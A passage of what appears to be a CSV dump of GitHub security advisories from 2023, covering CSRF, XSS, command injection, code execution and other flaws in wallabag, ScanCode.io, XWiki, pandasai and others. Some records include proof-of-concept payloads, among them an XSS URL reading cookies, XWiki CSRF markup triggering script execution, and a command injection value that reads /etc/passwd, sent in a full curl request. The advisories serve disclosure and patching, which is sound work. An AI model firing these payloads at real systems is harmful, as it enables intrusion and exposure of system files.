Cross-Site Request Forgery (CSRF) in GitHub repository wallabag/wallabag prior to 2.6.3.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'wallabag/wallabag'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0-alpha.1'}, {'fixed': '2.6.3'}]}], 'database_specific': {'last_known_affected_version_range': '<= 2.6.2'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-4454'}, {'type': 'WEB', 'url': 'https://github.com/wallabag/wallabag/commit/78b0b55c40511e1f22d5bbb4897aa10fca68441c'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/4ee0ef74-e4d4-46e7-a05c-076bce522299'}]","{'cwe_ids': ['CWE-352'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-08-21T20:47:10Z', 'nvd_published_at': None}"
1.4.0,GHSA-j63x-f657-2m9g,2023-08-03T16:42:33Z,2023-08-03T06:30:22Z,,['CVE-2023-4125'],Answer has Weak Password Requirements,Weak Password Requirements in GitHub repository answerdev/answer prior to v1.1.0.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/answerdev/answer'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.1.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-4125'}, {'type': 'WEB', 'url': 'https://github.com/answerdev/answer/commit/7d23b17cdbbefcd2e7b5c3150f0b5ec908dc835f'}, {'type': 'PACKAGE', 'url': 'https://github.com/answerdev/answer'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/85bfd18f-8d3b-4154-8b7b-1f8fcf704e28'}]","{'cwe_ids': ['CWE-521'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-08-03T16:42:33Z', 'nvd_published_at': None}"
1.4.0,GHSA-36hq-v2fc-rpqp,2023-08-16T21:13:57Z,2023-08-16T15:30:17Z,,['CVE-2023-40338'],Jenkins Folders Plugin information disclosure vulnerability,"Jenkins Folders Plugin displays an error message when attempting to access the Scan Organization Folder Log if no logs are available.

In Folders Plugin 6.846.v23698686f0f6 and earlier, this error message includes the absolute path of a log file, exposing information about the Jenkins controller file system.

Folders Plugin 6.848.ve3b_fd7839a_81 does not display the absolute path of a log file in the error message.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.jenkins-ci.plugins:cloudbees-folder'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.848.ve3b'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-40338'}, {'type': 'WEB', 'url': 'https://www.jenkins.io/security/advisory/2023-08-16/#SECURITY-3109'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2023/08/16/3'}]","{'cwe_ids': ['CWE-209', 'CWE-532'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-08-16T21:13:57Z', 'nvd_published_at': None}"
1.4.0,GHSA-6xcx-gx7r-rccj,2023-08-21T19:33:39Z,2023-08-15T20:04:49Z,,['CVE-2023-40024'],Scancode.io Reflected Cross-Site Scripting (XSS) in license endpoint,"### Summary
In the `/license/` endpoint, the detailed view key is not properly validated and sanitized, which can result in a potential cross-site scripting (XSS) vulnerability when attempting to access a detailed license view that does not exist.

### Details
In the `/license/` endpoint, the `license_details_view` function is vulnerable to a potential cross-site scripting (XSS) attack due to inadequate validation and sanitization of the `key` parameter. This vulnerability arises when attempting to access a key with malicious javascript.

```python
def license_details_view(request, key):
    """"""
    Display all available information about a given license `key` followed by
    the full license text.
    """"""
    licenses = get_licenses()
    try:
        data = saneyaml.dump(licenses[key].to_dict())
        text = licenses[key].text
    except KeyError:
        return HttpResponseNotFound(f""License {key} not found."") # Leads to cross-site scripting when key is malicious javascript
    return HttpResponse(f""
{data}

{text}
"") ``` ### PoC 1. Access following endpoint on scancode.io instance: http://localhost/license/%3Cscript%3Ealert(document.cookie);%3C/script%3E/ ### Impact Attackers can exploit the vulnerability to inject malicious scripts into the response generated by the `license_details_view` function. When unsuspecting users visit the page, their browsers will execute the injected scripts, leading to unauthorized actions, session hijacking, or stealing sensitive information. ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'scancodeio'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '32.5.2'}]}], 'database_specific': {'last_known_affected_version_range': '<= 32.5.1'}}]","[{'type': 'WEB', 'url': 'https://github.com/nexB/scancode.io/security/advisories/GHSA-6xcx-gx7r-rccj'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-40024'}, {'type': 'PACKAGE', 'url': 'https://github.com/nexB/scancode.io'}, {'type': 'WEB', 'url': 'https://github.com/nexB/scancode.io/blob/dd7769fbc97c84545579cebf1dc4838214098a11/CHANGELOG.rst#v3252-2023-08-14'}, {'type': 'WEB', 'url': 'https://github.com/nexB/scancode.io/releases/tag/v32.5.2'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-08-15T20:04:49Z', 'nvd_published_at': None}" 1.4.0,GHSA-8fjr-hghr-4m99,2023-09-06T19:17:29Z,2023-08-30T20:09:33Z,,['CVE-2023-36811'],Archive spoofing vulnerability in borgbackup,"### Impact A flaw in the cryptographic authentication scheme in borgbackup allowed an attacker to fake archives and potentially indirectly cause backup data loss in the repository. The attack requires an attacker to be able to 1. insert files (with no additional headers) into backups 2. gain write access to the repository This vulnerability does not disclose plaintext to the attacker, nor does it affect the authenticity of existing archives. Creating plausible fake archives may be feasible for empty or small archives, but is unlikely for large archives. Affected are all borgbackup releases prior to 1.2.5. Note: CVSS scoring model seemed to badly fit for this case, thus I manually set score to ""moderate"". ### Patches The issue has been fixed in borgbackup 1.2.5. But there was a bug in 1.2.5 upgrade instructions, thus 1.2.6 with an important fix in docs and code was released a day afterwards. Additionally to installing the fixed code, users must follow the upgrade procedure as documented in the latest version of the change log. ### Workarounds Data loss after being attacked can be avoided by reviewing the archives (timestamp and contents valid and as expected) after any ""borg check --repair"" and before ""borg prune"". ### References https://github.com/borgbackup/borg/blob/1.2.6/docs/changes.rst#pre-125-archives-spoofing-vulnerability-cve-2023-36811 ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'borgbackup'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.2.5'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/borgbackup/borg/security/advisories/GHSA-8fjr-hghr-4m99'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-36811'}, {'type': 'WEB', 'url': 'https://github.com/borgbackup/borg/commit/3eb070191da10c2d3f7bc6484cf3d51c3045f884'}, {'type': 'PACKAGE', 'url': 'https://github.com/borgbackup/borg'}, {'type': 'WEB', 'url': 'https://github.com/borgbackup/borg/blob/1.2.5-cvedocs/docs/changes.rst#pre-125-archives-spoofing-vulnerability-cve-2023-36811'}, {'type': 'WEB', 'url': 'https://github.com/borgbackup/borg/blob/1.2.6/docs/changes.rst#pre-125-archives-spoofing-vulnerability-cve-2023-36811'}, {'type': 'WEB', 'url': 'https://github.com/pypa/advisory-database/tree/main/vulns/borgbackup/PYSEC-2023-164.yaml'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5Q3OHXERTU547SEQ3YREZXHOCYNLVD63/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XOZDFIYEBIOKSIEAXUJJJFUJTAJ7TF3C/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZUCQSMAWOJBCRGF6XPKEZ2TPGAPNKIWV/'}]","{'cwe_ids': ['CWE-347'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-08-30T20:09:33Z', 'nvd_published_at': None}" 1.4.0,GHSA-ggcf-hwxp-rc77,2023-08-03T16:42:38Z,2023-08-03T06:30:22Z,,['CVE-2023-4126'],Answer Insufficient Session Expiration vulnerability,Insufficient Session Expiration in GitHub repository answerdev/answer prior to v1.1.0.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:L/I:L/A:L'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/answerdev/answer'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.1.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-4126'}, {'type': 'WEB', 'url': 'https://github.com/answerdev/answer/commit/4f468b58d0dea51290bfbdd3e96332b0014c8730'}, {'type': 'PACKAGE', 'url': 'https://github.com/answerdev/answer'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/7f50bf1c-bcb9-46ca-8cec-211493d280c5'}]","{'cwe_ids': ['CWE-613'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-08-03T16:42:38Z', 'nvd_published_at': None}" 1.4.0,GHSA-8fp9-43pw-56vw,2023-08-22T18:38:18Z,2023-08-15T18:31:32Z,,['CVE-2023-39661'],PandasAI vulnerable to arbitrary code execution,An issue in pandas-ai v.0.8.1 and before allows a remote attacker to execute arbitrary code via the `_is_jailbreak` function.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'pandasai'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.8.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-39661'}, {'type': 'WEB', 'url': 'https://github.com/gventuri/pandas-ai/issues/410'}, {'type': 'PACKAGE', 'url': 'https://github.com/gventuri/pandas-ai'}]","{'cwe_ids': ['CWE-74', 'CWE-94'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-08-15T21:10:21Z', 'nvd_published_at': None}" 1.4.0,GHSA-q7mc-fc87-v7w7,2023-08-08T22:37:00Z,2023-08-04T18:30:39Z,,['CVE-2022-41401'],OpenRefine Server-Side Request Forgery vulnerability,"OpenRefine <= v3.5.2 contains a Server-Side Request Forgery (SSRF) vulnerability, which permits unauthorized users to exploit the system, potentially leading to unauthorized access to internal resources and sensitive file disclosure.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.openrefine:main'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.6.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-41401'}, {'type': 'WEB', 'url': 'https://github.com/OpenRefine/OpenRefine/commit/8cb2fec45dd90fda8ed9608c691f6bb8ed721cd2'}, {'type': 'PACKAGE', 'url': 'https://github.com/OpenRefine/OpenRefine'}, {'type': 'WEB', 'url': 'https://github.com/OpenRefine/OpenRefine/blob/30d6edb7b6586623bda09456c797c35983fb80ff/main/tests/server/src/com/google/refine/importing/ImportingUtilitiesTests.java#L180'}, {'type': 'WEB', 'url': 'https://github.com/OpenRefine/OpenRefine/blob/cb55cdfdf6f9ca916839778dc847cce803688998/main/src/com/google/refine/importing/ImportingUtilities.java#L103'}, {'type': 'WEB', 'url': 'https://github.com/ixSly/CVE-2022-41401'}]","{'cwe_ids': ['CWE-918'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-08-04T21:25:42Z', 'nvd_published_at': None}" 1.4.0,GHSA-wwrg-2w5j-grvx,2023-08-03T22:20:11Z,2023-08-03T18:30:35Z,,['CVE-2023-4138'],RDiffWeb vulnerable to Allocation of Resources Without Limits or Throttling,Allocation of Resources Without Limits or Throttling in GitHub repository ikus060/rdiffweb prior to 2.8.0.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'rdiffweb'}, 'ecosystem_specific': {'affected_functions': ['rdiffweb.controller.page_pref_notification.PagePrefNotification']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.8.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-4138'}, {'type': 'WEB', 'url': 'https://github.com/ikus060/rdiffweb/commit/feef0d7b11d86aed29bf98c21526088117964d85'}, {'type': 'PACKAGE', 'url': 'https://github.com/ikus060/rdiffweb'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/1b1fa915-d588-4bb1-9e82-6a6be79befed'}]","{'cwe_ids': ['CWE-770'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-08-03T22:20:11Z', 'nvd_published_at': None}" 1.4.0,GHSA-w832-v3c6-m6rg,2023-08-21T20:46:52Z,2023-08-21T18:31:23Z,,['CVE-2023-39660'],pandasai vulnerable to prompt injection,An issue in Gaberiele Venturi pandasai v.0.8.0 and before allows a remote attacker to execute arbitrary code via a crafted request to the prompt function.,[],"[{'package': {'ecosystem': 'PyPI', 'name': 'pandasai'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.8.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-39660'}, {'type': 'WEB', 'url': 'https://github.com/gventuri/pandas-ai/issues/399'}, {'type': 'WEB', 'url': 'https://github.com/gventuri/pandas-ai/pull/409'}, {'type': 'WEB', 'url': 'https://github.com/gventuri/pandas-ai/commit/3aac79be8fc1d18b53d66a566adddbbdd2b38ad5'}, {'type': 'PACKAGE', 'url': 'https://github.com/gventuri/pandas-ai'}]","{'cwe_ids': ['CWE-94'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-08-21T20:46:52Z', 'nvd_published_at': None}" 1.4.0,GHSA-93wx-j2qv-49fg,2023-08-31T14:28:31Z,2023-08-23T06:30:17Z,,['CVE-2023-41100'],hCaptcha for EXT:form Broken Access Control vulnerability,An issue was discovered in the hcaptcha (aka hCaptcha for EXT:form) extension before 2.1.2 for TYPO3. It fails to check that the required captcha field is submitted in the form data. allowing a remote user to bypass the CAPTCHA check.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'waldhacker/hcaptcha'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-41100'}, {'type': 'WEB', 'url': 'https://github.com/FriendsOfPHP/security-advisories/blob/master/waldhacker/hcaptcha/CVE-2023-41100.yaml'}, {'type': 'PACKAGE', 'url': 'https://github.com/waldhacker/ext-hcaptcha'}, {'type': 'WEB', 'url': 'https://typo3.org/security/advisory/typo3-ext-sa-2023-007'}]","{'cwe_ids': [], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-08-23T18:41:21Z', 'nvd_published_at': None}" 1.4.0,GHSA-8xhr-x3v8-rghj,2023-08-23T20:41:30Z,2023-08-23T20:41:30Z,,['CVE-2023-40573'],"XWiki Platform's Groovy jobs check the wrong author, allowing remote code execution","### Impact XWiki supports scheduled jobs that contain Groovy scripts. Currently, the job checks the content author of the job for programming right. However, modifying or adding a job script to a document doesn't modify the content author. Together with a CSRF vulnerability in the job scheduler, this can be exploited for remote code execution by an attacker with edit right on the wiki. For successful exploitation, the needs to have edit right on a document whose content has last been changed by a user with programming right. This could be the user profile for users created by admins. In this document, the attacker can create an object of class `XWiki.SchedulerJobClass` using the object editor. By setting job class to `com.xpn.xwiki.plugin.scheduler.GroovyJob`, cron expression to `0 0/5 * * * ?` and job script to `services.logging.getLogger(""foo"").error(""Job content executed"")`, the attacker can create a job. Now this job just needs to be triggered or scheduled. This can be achieved by embedding an image with the following XWiki syntax in any document that is visited by an admin: `[[image:path:/xwiki/bin/view/Scheduler/?do=trigger&which=Attacker.Document]]` where `Attacker.Document` is the document that has been prepared by the attacker. If the attack is successful, an error log entry with ""Job content executed"" will be produced. ### Patches This vulnerability has been patched in XWiki 14.10.9 and 15.4RC1. ### Workarounds There is no workaround. ### References * https://jira.xwiki.org/browse/XWIKI-20852 * https://github.com/xwiki/xwiki-platform/commit/fcdcfed3fe2e8a3cad66ae0610795a2d58ab9662","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-scheduler-api'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '14.10.9'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'com.xpn.xwiki.platform.plugins:xwiki-plugin-scheduler'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.3'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-scheduler-api'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '15.0-rc-1'}, {'fixed': '15.4-rc-1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-8xhr-x3v8-rghj'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-40573'}, {'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/commit/fcdcfed3fe2e8a3cad66ae0610795a2d58ab9662'}, {'type': 'PACKAGE', 'url': 'https://github.com/xwiki/xwiki-platform'}, {'type': 'WEB', 'url': 'https://jira.xwiki.org/browse/XWIKI-20852'}]","{'cwe_ids': ['CWE-284'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-08-23T20:41:30Z', 'nvd_published_at': None}" 1.4.0,GHSA-mhp6-jvpx-2p4m,2023-09-01T01:19:08Z,2023-08-29T18:31:53Z,,['CVE-2023-40889'],Heap-based buffer overflow in ZBar,"A heap-based buffer overflow exists in the qr_reader_match_centers function of ZBar 0.23.90. Specially crafted QR codes may lead to information disclosure and/or arbitrary code execution. To trigger this vulnerability, an attacker can digitally input the malicious QR code, or prepare it to be physically scanned by the vulnerable scanner.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'zbar'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.23.90'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-40889'}, {'type': 'PACKAGE', 'url': 'https://github.com/mchehab/zbar'}, {'type': 'WEB', 'url': 'https://hackmd.io/@cspl/B1ZkFZv23'}]","{'cwe_ids': ['CWE-122', 'CWE-787'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-08-30T20:22:19Z', 'nvd_published_at': None}" 1.4.0,GHSA-4f8m-7h83-9f6m,2023-09-01T19:44:42Z,2023-08-23T20:37:04Z,,['CVE-2023-40572'],XWiki Platform vulnerable to CSRF privilege escalation/RCE via the create action,"### Impact The create action is vulnerable to a CSRF attack, allowing script and thus remote code execution when targeting a user with script/programming right, thus compromising the confidentiality, integrity and availability of the whole XWiki installation. To reproduce, the XWiki syntax `[[image:path:/xwiki/bin/create/Foo/WebHome?template=&parent=Main.WebHome&title=$services.logging.getLogger(%22foo%22).error(%22Script%20executed!%22)]]` can be added to any place that supports XWiki syntax like a comment. When a user with script right views this image and a log message `ERROR foo - Script executed!` appears in the log, the XWiki installation is vulnerable. ### Patches This has been patched in XWiki 14.10.9 and 15.4RC1 by requiring a CSRF token for the actual page creation. ### Workarounds There are no known workarounds. ### References * https://jira.xwiki.org/browse/XWIKI-20849 * https://github.com/xwiki/xwiki-platform/commit/4b20528808d0c311290b0d9ab2cfc44063380ef7","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-oldcore'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.2-milestone-3'}, {'fixed': '14.10.9'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-oldcore'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '15.0-rc-1'}, {'fixed': '15.4-rc-1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-4f8m-7h83-9f6m'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-40572'}, {'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/commit/123e5d7e4ca06bf75b95aaef665aafc4fa9cae64'}, {'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/commit/4b20528808d0c311290b0d9ab2cfc44063380ef7'}, {'type': 'PACKAGE', 'url': 'https://github.com/xwiki/xwiki-platform'}, {'type': 'WEB', 'url': 'https://jira.xwiki.org/browse/XWIKI-20849'}]","{'cwe_ids': ['CWE-352'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-08-23T20:37:04Z', 'nvd_published_at': None}" 1.4.0,GHSA-9v3w-w2jh-4hff,2023-08-01T16:58:49Z,2023-08-01T00:30:17Z,,['CVE-2023-3462'],HashiCorp Vault and Vault Enterprise vulnerable to user enumeration,HashiCorp's Vault and Vault Enterprise are vulnerable to user enumeration when using the LDAP auth method. An attacker may submit requests of existent and non-existent LDAP users and observe the response from Vault to check if the account is valid on the LDAP server. This vulnerability is fixed in Vault 1.14.1 and 1.13.5.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/hashicorp/vault'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.13.5'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/hashicorp/vault'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.14.0'}, {'fixed': '1.14.1'}]}], 'versions': ['1.14.0']}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-3462'}, {'type': 'WEB', 'url': 'https://discuss.hashicorp.com/t/hcsec-2023-24-vaults-ldap-auth-method-allows-for-user-enumeration/56714'}, {'type': 'PACKAGE', 'url': 'https://github.com/hashicorp/vault'}]","{'cwe_ids': ['CWE-203'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-08-01T16:58:49Z', 'nvd_published_at': None}" 1.4.0,GHSA-2ggp-cmvm-f62f,2023-08-09T14:41:23Z,2023-08-09T14:41:23Z,,['CVE-2023-39523'],ScanCode.io command injection in docker image fetch process,"## Command Injection in docker fetch process ### Summary A possible command injection in the docker fetch process as it allows to append malicious commands in the docker_reference parameter. ### Details In the function `scanpipe/pipes/fetch.py:fetch_docker_image`[1] the parameter `docker_reference` is user controllable. The `docker_reference` variable is then passed to the vulnerable function `get_docker_image_platform`. ```python def fetch_docker_image(docker_reference, to=None): """""" code snipped .... """""" platform_args = [] platform = get_docker_image_platform(docker_reference) # User controlled `docker_reference` passed """""" code snipped... """""" ``` However, the `get_docker_image_plaform` function constructs a shell command with the passed `docker_reference`. The `pipes.run_command` then executes the shell command without any prior sanitization, making the function vulnerable to command injections. ```python def get_docker_image_platform(docker_reference): """""" Return a platform mapping of a docker reference. If there are more than one, return the first one by default. """""" skopeo_executable = _get_skopeo_location() """""" Constructing a shell command with user controlled variable `docker_reference` """""" cmd = ( f""{skopeo_executable} inspect --insecure-policy --raw --no-creds "" f""{docker_reference}"" ) logger.info(f""Fetching image os/arch data: {cmd}"") exitcode, output = pipes.run_command(cmd) # Executing command logger.info(output) if exitcode != 0: raise FetchDockerImageError(output) ``` A malicious user who is able to create or add inputs to a project can inject commands. Although the command injections are blind and the user will not receive direct feedback without logs, it is still possible to cause damage to the server/container. The vulnerability appears for example if a malicious user adds a semicolon after the input of `docker://;`, it would allow appending malicious commands. ### PoC 1. Create a new project with following input `docker://;echo${IFS}""PoC""${IFS}&&cat${IFS}/etc/passwd` in the filed Download URLs ![image](https://user-images.githubusercontent.com/122313513/258454691-7cabe100-f82d-44b9-99f2-5d6a0949e6c4.png) 2. Check docker logs to see the command execution ![image](https://user-images.githubusercontent.com/122313513/258455082-d7590b16-6fcb-4041-949f-2e20959db713.png) ```bash curl -i -s -k -X $'POST' \ -H $'Host: localhost' -H $'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/110.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Content-Type: multipart/form-data; boundary=---------------------------2742275543734015476190112060' -H $'Content-Length: 923' -H $'Origin: http://localhost' -H $'DNT: 1' -H $'Connection: close' -H $'Referer: http://localhost/project/add/' -H $'Upgrade-Insecure-Requests: 1' -H $'Sec-Fetch-Dest: document' -H $'Sec-Fetch-Mode: navigate' -H $'Sec-Fetch-Site: same-origin' -H $'Sec-Fetch-User: ?1' \ -b $'csrftoken=7H2chgA7jPHnXK0NNPftIoCW9z8SabKR' \ --data-binary $'-----------------------------2742275543734015476190112060\x0d\x0aContent-Disposition: form-data; name=\""csrfmiddlewaretoken\""\x0d\x0a\x0d\x0ayslGuNnvWloFUEUCWI5VlMuZ60ZDDSkFvZdIBTNs50VSHeKfznaeT0WL5pXlDTUm\x0d\x0a-----------------------------2742275543734015476190112060\x0d\x0aContent-Disposition: form-data; name=\""name\""\x0d\x0a\x0d\x0apoc\x0d\x0a-----------------------------2742275543734015476190112060\x0d\x0aContent-Disposition: form-data; name=\""input_files\""; filename=\""\""\x0d\x0aContent-Type: application/octet-stream\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------2742275543734015476190112060\x0d\x0aContent-Disposition: form-data; name=\""input_urls\""\x0d\x0a\x0d\x0adocker://;echo${IFS}\""PoC\""${IFS}&&cat${IFS}/etc/passwd\x0d\x0a-----------------------------2742275543734015476190112060\x0d\x0aContent-Disposition: form-data; name=\""pipeline\""\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------2742275543734015476190112060\x0d\x0aContent-Disposition: form-data; name=\""execute_now\""\x0d\x0a\x0d\x0aon\x0d\x0a-----------------------------2742275543734015476190112060--\x0d\x0a' \ $'http://localhost/project/add/' ``` **Mitigations** The `docker_reference` input should be sanitized to avoid command injections and it is not recommend to create commands with user controlled input directly. **Tested on:** - Commit: Latest commit [bda3a70e0b8cd95433928db1fd4b23051bc7b7eb] - OS: Ubuntu Linux Kernel 5.19.0 **References** [1] https://github.com/nexB/scancode.io/blob/main/scanpipe/pipes/fetch.py#L185 ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'scancodeio'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '32.5.1'}]}], 'database_specific': {'last_known_affected_version_range': '<= 32.5.0'}}]","[{'type': 'WEB', 'url': 'https://github.com/nexB/scancode.io/security/advisories/GHSA-2ggp-cmvm-f62f'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-39523'}, {'type': 'WEB', 'url': 